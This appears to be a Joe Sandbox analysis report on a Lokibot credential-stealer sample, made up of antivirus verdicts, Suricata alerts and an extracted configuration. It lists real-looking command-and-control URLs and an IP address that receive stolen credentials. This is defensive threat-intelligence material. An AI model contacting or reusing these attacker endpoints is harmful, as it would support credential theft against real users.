2025-01-11T01:43:03.707674+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51230	94.156.177.41	80	TCP
2025-01-11T01:43:04.854034+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51231	94.156.177.41	80	TCP
2025-01-11T01:43:05.736299+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51232	94.156.177.41	80	TCP
2025-01-11T01:43:06.614277+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51233	94.156.177.41	80	TCP
2025-01-11T01:43:07.773450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51234	94.156.177.41	80	TCP
2025-01-11T01:43:08.660221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51235	94.156.177.41	80	TCP
2025-01-11T01:43:09.514398+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51236	94.156.177.41	80	TCP
2025-01-11T01:43:10.707200+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51237	94.156.177.41	80	TCP
2025-01-11T01:43:11.607612+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51238	94.156.177.41	80	TCP
2025-01-11T01:43:12.528797+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51239	94.156.177.41	80	TCP
2025-01-11T01:43:13.572275+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51240	94.156.177.41	80	TCP
2025-01-11T01:43:14.611221+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51241	94.156.177.41	80	TCP
2025-01-11T01:43:15.469661+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51242	94.156.177.41	80	TCP
2025-01-11T01:43:16.338867+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51243	94.156.177.41	80	TCP
2025-01-11T01:43:17.186517+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51244	94.156.177.41	80	TCP
2025-01-11T01:43:18.171449+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51245	94.156.177.41	80	TCP
2025-01-11T01:43:19.049624+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51246	94.156.177.41	80	TCP
2025-01-11T01:43:19.935376+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51247	94.156.177.41	80	TCP
2025-01-11T01:43:20.826439+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51248	94.156.177.41	80	TCP
2025-01-11T01:43:21.716741+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51249	94.156.177.41	80	TCP
2025-01-11T01:43:22.578331+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51250	94.156.177.41	80	TCP
2025-01-11T01:43:23.456554+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51251	94.156.177.41	80	TCP
2025-01-11T01:43:24.327063+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51252	94.156.177.41	80	TCP
2025-01-11T01:43:25.184735+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51253	94.156.177.41	80	TCP
2025-01-11T01:43:26.109254+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51254	94.156.177.41	80	TCP
2025-01-11T01:43:26.979791+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51255	94.156.177.41	80	TCP
2025-01-11T01:43:27.847811+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51256	94.156.177.41	80	TCP
2025-01-11T01:43:28.764296+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51257	94.156.177.41	80	TCP
2025-01-11T01:43:29.742691+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51258	94.156.177.41	80	TCP
2025-01-11T01:43:30.877186+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51259	94.156.177.41	80	TCP
2025-01-11T01:43:31.748335+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51260	94.156.177.41	80	TCP
2025-01-11T01:43:32.607831+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51261	94.156.177.41	80	TCP
2025-01-11T01:43:33.949545+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51262	94.156.177.41	80	TCP
2025-01-11T01:43:34.814322+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51263	94.156.177.41	80	TCP
2025-01-11T01:43:35.685742+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51264	94.156.177.41	80	TCP
2025-01-11T01:43:36.565085+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51266	94.156.177.41	80	TCP
2025-01-11T01:43:37.485335+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51273	94.156.177.41	80	TCP
2025-01-11T01:43:38.387023+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51280	94.156.177.41	80	TCP
2025-01-11T01:43:39.246713+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51289	94.156.177.41	80	TCP
2025-01-11T01:43:40.188662+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51297	94.156.177.41	80	TCP
2025-01-11T01:43:41.063388+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51303	94.156.177.41	80	TCP
2025-01-11T01:43:42.036690+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51309	94.156.177.41	80	TCP
2025-01-11T01:43:42.952923+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51315	94.156.177.41	80	TCP
2025-01-11T01:43:43.902308+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51321	94.156.177.41	80	TCP
2025-01-11T01:43:44.785246+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51327	94.156.177.41	80	TCP
2025-01-11T01:43:45.736146+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51333	94.156.177.41	80	TCP
2025-01-11T01:43:46.597242+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51339	94.156.177.41	80	TCP
2025-01-11T01:43:47.457823+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51346	94.156.177.41	80	TCP
2025-01-11T01:43:48.358447+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51353	94.156.177.41	80	TCP
2025-01-11T01:43:49.238277+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51360	94.156.177.41	80	TCP
2025-01-11T01:43:50.112871+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51368	94.156.177.41	80	TCP
2025-01-11T01:43:50.991939+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51374	94.156.177.41	80	TCP
2025-01-11T01:43:51.872833+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51380	94.156.177.41	80	TCP
2025-01-11T01:43:53.011219+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51388	94.156.177.41	80	TCP
2025-01-11T01:43:53.904054+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51395	94.156.177.41	80	TCP
2025-01-11T01:43:54.763804+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51403	94.156.177.41	80	TCP
2025-01-11T01:43:55.926731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51406	94.156.177.41	80	TCP
2025-01-11T01:43:56.799040+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51415	94.156.177.41	80	TCP
2025-01-11T01:43:57.706794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51421	94.156.177.41	80	TCP
2025-01-11T01:43:58.606872+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51427	94.156.177.41	80	TCP
2025-01-11T01:43:59.461313+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51433	94.156.177.41	80	TCP
2025-01-11T01:44:00.327731+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51439	94.156.177.41	80	TCP
2025-01-11T01:44:01.206037+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51446	94.156.177.41	80	TCP
2025-01-11T01:44:02.066708+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51454	94.156.177.41	80	TCP
2025-01-11T01:44:03.052322+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51459	94.156.177.41	80	TCP
2025-01-11T01:44:03.938794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51468	94.156.177.41	80	TCP
2025-01-11T01:44:04.874883+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51474	94.156.177.41	80	TCP
2025-01-11T01:44:05.900134+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51480	94.156.177.41	80	TCP
2025-01-11T01:44:06.794404+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51486	94.156.177.41	80	TCP
2025-01-11T01:44:07.842580+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51497	94.156.177.41	80	TCP
2025-01-11T01:44:08.809214+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51503	94.156.177.41	80	TCP
2025-01-11T01:44:09.691470+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51509	94.156.177.41	80	TCP
2025-01-11T01:44:10.558794+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51515	94.156.177.41	80	TCP
2025-01-11T01:44:11.428450+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51521	94.156.177.41	80	TCP
2025-01-11T01:44:12.445729+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51531	94.156.177.41	80	TCP
2025-01-11T01:44:13.353273+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51537	94.156.177.41	80	TCP
2025-01-11T01:44:14.206617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51544	94.156.177.41	80	TCP
2025-01-11T01:44:15.088828+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51550	94.156.177.41	80	TCP
2025-01-11T01:44:16.015685+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51557	94.156.177.41	80	TCP
2025-01-11T01:44:16.870270+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51565	94.156.177.41	80	TCP
2025-01-11T01:44:17.776454+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51571	94.156.177.41	80	TCP
2025-01-11T01:44:18.905117+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51577	94.156.177.41	80	TCP
2025-01-11T01:44:19.764965+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51581	94.156.177.41	80	TCP
2025-01-11T01:44:20.625881+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51582	94.156.177.41	80	TCP
2025-01-11T01:44:21.737700+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51583	94.156.177.41	80	TCP
2025-01-11T01:44:22.607373+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51584	94.156.177.41	80	TCP
2025-01-11T01:44:23.517156+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51585	94.156.177.41	80	TCP
2025-01-11T01:44:24.362511+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51586	94.156.177.41	80	TCP
2025-01-11T01:44:25.207598+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.8	51587	94.156.177.41	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: EozUxz4ybi.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://94.156.177.41/simple/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.0.EozUxz4ybi.exe.400000.0.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: EozUxz4ybi.exe	Virustotal: Detection: 86%			Perma Link
Source: EozUxz4ybi.exe	ReversingLabs: Detection: 100%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: EozUxz4ybi.exe

Joe Sandbox ML: detected

Source: EozUxz4ybi.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\EozUxz4ybi.exe

Code function: 0_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

0_2_00403D74

Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 4x nop then xor byte ptr [esi], bl		0_2_004036F2
Source: C:\Users\user\Desktop\EozUxz4ybi.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h		0_2_004036F2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49734 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49734 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49723 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49734 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49723 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49723 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51240 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49710 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51240 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49729 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51263 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51240 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49729 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49704 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49723 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49729 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49723 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49704 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49704 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51263 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51240 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51253 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51240 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49730 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49717 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51263 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49727 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49729 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49729 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51263 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51256 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51263 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49704 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:51237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:51237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49735 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49726 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:51237 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49707 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49714 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49724 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:51234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:51234 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49709 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.8:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.8:49740 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49739 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49741 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.8:49720 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.8:49705 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.8:49708 -> 94.156.177.41:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.8:49708 -> 94.156.177.41:80
